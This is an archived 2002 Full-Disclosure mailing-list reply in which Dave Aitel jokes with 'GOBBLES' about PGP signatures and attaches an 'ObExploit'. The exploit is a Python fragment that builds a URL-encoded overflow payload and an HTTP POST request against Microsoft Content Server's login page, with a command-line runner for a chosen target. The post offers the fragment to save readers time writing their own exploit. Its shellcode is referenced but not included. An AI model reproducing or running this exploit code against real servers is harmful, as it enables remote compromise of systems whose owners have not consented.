Full Disclosure mailing list archives

ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p

From: full-disclosure () lists netsys com (Dave Aitel)
Date: 14 Aug 2002 17:06:11 -0400

--=-hbPpmNmOVRvunQGqxXzl
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

At least you got the key id correct that time. It's not a valid
signature, but at least it produces one less error message.

-dave

ObExploit:

#fragment of my exploit for MS Content Server
#the full exploit can be found at https://immunitysec.com/members/
#but if you're not a member, this might save you some time writing your
#exploit.

#returns the sploitstring
    def makesploit(self):
        header=3D""
        body=3D""

        body+=3D"NR_DOMAIN=3DWinNT%3A%2F%2F"
        #1 alignment byte so we are word aligned with the return addr
        attack=3D""
        attack+=3D"A"
        attack+=3D"\x41\xb9"*4000
        #unicode shellcode!!
        attack=3Dstroverwrite(attack,unicodeloop,1)
        print "length of overflow =3D "+str(len(attack))
        attack=3Durllib.quote(attack)
        #print attack
       =20
        body+=3Dattack
      =20
body+=3D"&NR_DOMAIN_LIST=3DWinNT%3A%2F%2FOAG4ZA0SR80BCRG&NR_USER=3D&NR_PASS=
WORD=3D&submit1=3DContinue&NEXTURL=3D%2FNR%2FSystem%2FAccess%2FDefaultGuest=
Login.asp"
       =20

       =20
        header+=3D"POST /NR/System/Access/ManualLoginSubmit.asp
HTTP/1.1\r\n"
        header+=3D"Host: "+self.host+"\r\n"
        header+=3D"User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows
NT; Bob)\r\n"
        header+=3D"Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=3D0.9,text/plain=
;q=3D0.8,video/x-mng,image/png,image/jpeg,image/gif;q=3D0.2,text/css,*/*;q=
=3D0.1\r\n"
        header+=3D"Connection: keep-alive\r\n"
        header+=3D"Content-Type: application/x-www-form-urlencoded\r\n"
        header+=3D"Content-Length: "+str(len(body))+"\r\n"
        header+=3D"\r\n"
       =20
        return header+body
       =20
   =20

#this stuff happens.
if __name__ =3D=3D '__main__':

    print "Running Microsoft Content Server exploit v 0.1"
    app =3D mscsexploit()
    if len(sys.argv) < 2:
        print "Usage: mycontent.py target [port] [ssl=3D0]"
        sys.exit()
       =20
    app.setHost(sys.argv[1])
    if len(sys.argv) > 2:
        app.setPort(int(sys.argv[2]))

    if len(sys.argv) > 3:
        app.setSSL(1)
       =20
    app.run()


On Wed, 2002-08-14 at 17:00, gobbles () hush com wrote:

=20
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=20
or if you like
=20
On 14 Aug 2002 16:36:09 -0400, Dave Aitel <dave () immunitysec com> wrote:

On Wed, 2002-08-14 at 17:04, Charles Stevenson wrote:

Gobbles,
=20
On Wed, Aug 14, 2002 at 12:33:27PM -0700, gobbles () hush com wrote:

GOBBLES just want to be cool whitehat like everyone else.  Time for =

new

leaf time for six figure salary stock option naked breasted assistant.

=20
Word to that my man! ;)
=20
peace,
core


Your message was signed, but the "GOBBLES" message was not and therefore
just a forgery, most likely.

BTW:
http://www.immunitysec.com/vulnerabilities/
They arn't advisories, but if you need something to show to your boss
about why you disconnected your Exchange/SQL server from the Internet,
it's a good start.=20

Dave Aitel
Immunity, Inc

=20
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com
=20
wlwEARECABwFAj1H8s4VHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPl8QA
nA66Z1OWuMnTnOhLlFQLa0nOHSZtAJsFKJo5AOe/7/OYbXpZRd3grAD8MQ=3D=3D
=3Dxfu0
-----END PGP SIGNATURE-----
=20
=20
Communicate in total privacy.
Get your free encrypted email at https://www.hushmail.com/?l=3D2
=20
Looking for a good deal on a domain name? http://www.hush.com/partners/of=

fers.cgi?id=3Ddomainpeople

=20
=20



--=-hbPpmNmOVRvunQGqxXzl
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQA9WsZDB8JNm+PA+iURAiiVAJ9iL6BLrShaxaW4kJuT7LjtJ8QCGACdFWsL
Ps/BuHtuIOHo6njXbzxoQDA=
=MIej
-----END PGP SIGNATURE-----

--=-hbPpmNmOVRvunQGqxXzl--

Current thread:

ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p, (continued)
- - - ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p Bugtraq storage account (Aug 14)
    - ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p J.A. Terranson (Aug 14)
    - ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p Jonathan Rickman (Aug 14)
    - ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p Azerail (Aug 15)
    - ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p ssinct (Aug 15)
    - SPIKE v2.5 Nicolas Couture (Aug 14)
    - RE: SPIKE v2.5 Nicolas Couture (Aug 14)
- ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p full-disclosure () lists netsys com (Aug 14)
  - ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p Gary E. Miller (Aug 14)
- ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p full-disclosure () lists netsys com (Aug 14)
  - ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p Dave Aitel (Aug 14)
  - ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p Gary E. Miller (Aug 14)
- ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p full-disclosure () lists netsys com (Aug 14)